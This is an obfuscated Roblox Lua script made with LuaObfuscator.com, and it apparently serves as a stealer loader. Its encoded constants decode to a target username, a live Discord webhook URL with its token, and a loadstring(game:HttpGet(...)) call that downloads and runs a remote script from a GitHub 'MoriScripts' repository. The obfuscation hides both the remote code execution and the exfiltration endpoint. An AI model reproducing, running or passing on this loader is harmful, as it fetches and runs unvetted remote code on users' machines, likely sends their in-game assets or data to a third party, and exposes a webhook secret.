--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v67=(v31/((1639 -(1523 + 114))^(v32-((2 + 0) -(1 -0)))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v67-(v67%(932 -(857 + 74))) ;else local v68=0;local v69;while true do if (v68==(568 -(367 + 201))) then v69=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v69 + v69))>=v69) and (1 + 0)) or ((1942 -(68 + 997)) -(282 + 595)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + ((1249 + 25) -(226 + 1044)) ;return (v37 * 16777216) + (v36 * (285370 -219834)) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=701 -(376 + 325) ;local v39;local v40;local v41;local v42;local v43;local v44;while true do if (v38~=2) then else for v77=1,v24() do local v78=0 -0 ;local v79;while true do if (v78==0) then v79=v22();if (v21(v79,2 -1 ,1 + 0 )==(0 -0)) then local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==2) then v121=nil;while true do if (2==v117) then v121=nil;while true do if (v118~=2) then else while true do if (v118~=0) then else local v163=14 -(9 + 5) ;while true do if (v163~=(376 -(85 + 291))) then else local v172=0;while true do if ((1266 -(243 + 1022))~=v172) then else v163=1;break;end if (v172~=(0 -0)) then else v119=v21(v79,2 + 0 ,3);v120=v21(v79,4,1186 -(1123 + 57) );v172=1 + 0 ;end end end if ((255 -(163 + 91))==v163) then v118=1;break;end end end if (v118~=(1932 -(1869 + 61))) then else local v164=0 + 0 ;local v165;local v166;while true do if (v164~=0) then else v165=0 -0 ;v166=nil;v164=1 -0 ;end if (v164~=1) then else while true do if (v165~=(0 + 0)) then else v166=0 -0 ;while true do if (v166==(1 + 0)) then v118=1477 -(1329 + 145) ;break;end if (v166==(971 -(140 + 831))) then local v175=1850 -(1409 + 441) ;while true do if ((719 -(15 + 703))==v175) then v166=1;break;end if (v175==0) then if (v21(v120,1,1)~=(1 + 0)) then else v121[440 -(262 + 176) ]=v44[v121[1723 -(345 + 1376) ]];end if (v21(v120,690 -(198 + 490) ,2)==1) then v121[13 -10 ]=v44[v121[6 -3 ]];end v175=1207 -(696 + 510) ;end end end end break;end end break;end end end if (v118==(1 -0)) then local v167=1262 -(1091 + 171) ;local v168;while true do if (v167~=0) then else v168=0 + 0 ;while true do if (v168~=(3 -2)) then else v118=6 -4 ;break;end if (v168~=(374 -(123 + 251))) then else local v173=0 -0 ;local v174;while true do if (v173~=(698 -(208 + 490))) then else v174=0 + 0 ;while true do if (0~=v174) then else local v176=0 + 0 ;while true do if (v176~=(837 -(660 + 176))) then else v174=1 + 0 ;break;end if ((202 -(14 + 188))~=v176) then else v121={v23(),v23(),nil,nil};if (v119==(0 + 0)) then local v181=0 + 0 ;while true do if (v181~=0) then else v121[6 -3 ]=v23();v121[5 -1 ]=v23();break;end end elseif (v119==1) then v121[8 -5 ]=v24();elseif (v119==(2 + 0)) then v121[2 + 1 ]=v24() -((398 -(115 + 281))^16) ;elseif (v119==(6 -3)) then local v186=0 + 0 ;local v187;while true do if (0~=v186) then else v187=0;while true do if ((0 -0)==v187) then v121[10 -7 ]=v24() -(2^16) ;v121[871 -(550 + 317) ]=v23();break;end end break;end end end v176=1 -0 ;end end end if (v174==(1 -0)) then v168=2 -1 ;break;end end break;end end end end break;end end end if (v118~=3) then else if (v21(v120,3,288 -(134 + 151) )~=(1666 -(970 + 695))) then else v121[7 -3 ]=v44[v121[4]];end v39[v77]=v121;break;end end break;end if (v118==0) then local v161=0;while true do if (v161~=(1990 -(582 + 1408))) then else v118=0 -0 ;v119=nil;v161=1 -0 ;end if (v161==1) then v118=3 -2 ;break;end end end if (v118==1) then local v162=0;while true do if (v162~=(1825 -(1195 + 629))) then else v118=2;break;end if (v162~=(0 -0)) then else v120=nil;v121=nil;v162=1;end end end end break;end if (v117==1) then local v156=0;while true do if (v156~=0) then else v119=nil;v120=nil;v156=242 -(187 + 54) ;end if (v156~=(781 -(162 + 618))) then else v117=2 + 0 ;break;end end end if (v117==(0 + 0)) then v118=0;v118=nil;v117=1 -0 ;end end break;end if (v116~=(0 -0)) then else v117=0 + 0 ;v118=nil;v116=1637 -(1373 + 263) ;end if ((1001 -(451 + 549))~=v116) then else v119=nil;v120=nil;v116=1 + 1 ;end end end break;end end end for v80=1 -0 ,v24() do v40[v80-(1 -0) ]=v29();end return v42;end if (v38==1) then local v72=0;while true do if (v72~=(1385 -(746 + 638))) then else for v107=1 + 0 ,v43 do local v108=0;local v109;local v110;local v111;while true do if (v108==(0 -0)) then v109=341 -(218 + 123) ;v110=nil;v108=1582 -(1535 + 46) ;end if (v108~=1) then else v111=nil;while true do if (v109~=1) then else if (v110==1) then v111=v22()~=0 ;elseif (v110==(2 + 0)) then v111=v25();elseif (v110~=3) then else v111=v26();end v44[v107]=v111;break;end if (v109==0) then local v136=0;local v137;while true do if ((0 + 0)==v136) then v137=0;while true do if (v137~=(561 -(306 + 254))) then else v109=1 + 0 ;break;end if (v137~=0) then else v110=v22();v111=nil;v137=1;end end break;end end end end break;end end end v42[3]=v22();v72=2;end if (v72~=2) then else v38=3 -1 ;break;end if (0==v72) then v43=v24();v44={};v72=1468 -(899 + 568) ;end end end if (v38~=(0 + 0)) then else local v73=0 -0 ;while true do if (v73~=1) then else local v105=0;while true do if (v105~=(604 -(268 + 335))) then else v73=2;break;end if (v105==(290 -(60 + 230))) then v41={};v42={v39,v40,nil,v41};v105=1457 -(282 + 1174) ;end end end if (v73~=2) then else v38=1;break;end if (v73==(811 -(569 + 242))) then local v106=0;while true do if (v106==0) then v39={};v40={};v106=2 -1 ;end if ((1 + 0)==v106) then v73=1025 -(706 + 318) ;break;end end end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=v24();local v46=v24();local v47=1 + 0 ;local v48=(v21(v46,1252 -(721 + 530) ,1291 -(945 + 326) ) * ((4 -2)^(29 + 3))) + v45 ;local v49=v21(v46,721 -(271 + (1422 -993)) ,24 + 5 + 2 );local v50=((v21(v46,1532 -(204 + 1204 + 92) )==(1 + (0 -0))) and  -(1087 -(461 + (690 -(30 + 35))))) or (2 -1) ;if (v49==(114 -(4 + 110))) then if (v48==(1288 -(993 + 295))) then return v50 * (0 + 0) ;else local v82=0;while true do if (v82==0) then v49=1172 -(418 + 753) ;v47=0 + 0 ;break;end end end elseif (v49==(211 + 1836)) then return ((v48==(0 + 0)) and (v50 * ((1 + 0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(1552 -(406 + 123)) ) * (v47 + (v48/((1771 -(1749 + 20))^(89 -37)))) ;end v26=nil;function v26(v51)local v52=0 + 0 ;local v53;local v54;while true do if (v52==(414 -(15 + 398))) then v53=v3(v16,v19,(v19 + v51) -(1258 -(1043 + 214)) );v19=v19 + v51 ;v52=7 -5 ;end if (v52==(1 + 1 + 1)) then return v6(v54);end if (v52==(2 + 0)) then v54={};for v83=3 -2 , #v53 do v54[v83]=v2(v1(v3(v53,v83,v83)));end v52=(1953 -(542 + 196)) -(323 + 889) ;end if (v52==((0 -0) -0)) then v53=nil;if  not v51 then local v100=580 -(106 + 255 + 219) ;while true do if (v100==0) then v51=v24();if (v51==(126 -(116 + 6 + 4))) then return "";end break;end end end v52=321 -(53 + 97 + 170) ;end end end v18=5;end if (v18==2) then function v22()local v55=0 -0 ;local v56;while true do if (v55==(2 -(1122 -(118 + 1003)))) then return v56;end if (v55==((4538 -2987) -(1126 + 425))) then v56=v1(v16,v19,v19);v19=v19 + (406 -(118 + 287)) ;v55=3 -2 ;end end end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (379 -(142 + 235)) );v19=v19 + (9 -7) ;return (v58 * (56 + 200)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v59,1,1));return "";end end else local v71=v2(v0(v59,16));if v20 then local v85=v5(v71,v20);v20=nil;return v85;else return v71;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v86=v64;local v87=v65;local v88=v66;local v89=v28;local v90=1;local v91= -1;local v92={};local v93={...};local v94=v12("#",...) -1 ;local v95={};local v96={};for v101=0,v94 do if (v101>=v88) then v92[v101-v88 ]=v93[v101 + 1 ];else v96[v101]=v93[v101 + 1 ];end end local v97=(v94-v88) + 1 ;local v98;local v99;while true do v98=v86[v90];v99=v98[1];if (v99<=4) then if (v99<=1) then if (v99>0) then v96[v98[2]]=v98[3];else v96[v98[2]]=v62[v98[3]];end elseif (v99<=2) then v62[v98[3]]=v96[v98[2]];elseif (v99>3) then do return;end else local v138=v98[2];local v139=v96[v98[3]];v96[v138 + 1 ]=v139;v96[v138]=v139[v98[4]];end elseif (v99<=6) then if (v99>5) then v96[v98[2]]=v98[3]~=0 ;else v96[v98[2]]();end elseif (v99<=7) then local v129=v98[2];local v130,v131=v89(v96[v129](v13(v96,v129 + 1 ,v98[3])));v91=(v131 + v129) -1 ;local v132=0;for v133=v129,v91 do local v134=0;while true do if (v134==0) then v132=v132 + 1 ;v96[v133]=v130[v132];break;end end end elseif (v99==8) then local v143;local v144;v96[v98[2]]=v98[3];v90=v90 + 1 ;v98=v86[v90];v62[v98[3]]=v96[v98[2]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];v90=v90 + 1 ;v98=v86[v90];v62[v98[3]]=v96[v98[2]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];v90=v90 + 1 ;v98=v86[v90];v62[v98[3]]=v96[v98[2]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v62[v98[3]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v62[v98[3]];v90=v90 + 1 ;v98=v86[v90];v144=v98[2];v143=v96[v98[3]];v96[v144 + 1 ]=v143;v96[v144]=v143[v98[4]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];else local v154=0;local v155;while true do if (v154==0) then v155=v98[2];v96[v155]=v96[v155](v13(v96,v155 + 1 ,v91));break;end end end v90=v90 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365724E616D6503123O006962726168696D61736F676C7570726F363303073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F2O312O353837392O31333432393633352O31322F4D49734F5F77464F3034434E61624F444E2D767973506754567968637054584E3942437079697A6E45575877527A392O57376349736E645633717470677135324B32485603093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012083O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0006000400014O0007000100044O00095O00022O00053O000100012O00043O00017O00",v9(),...);
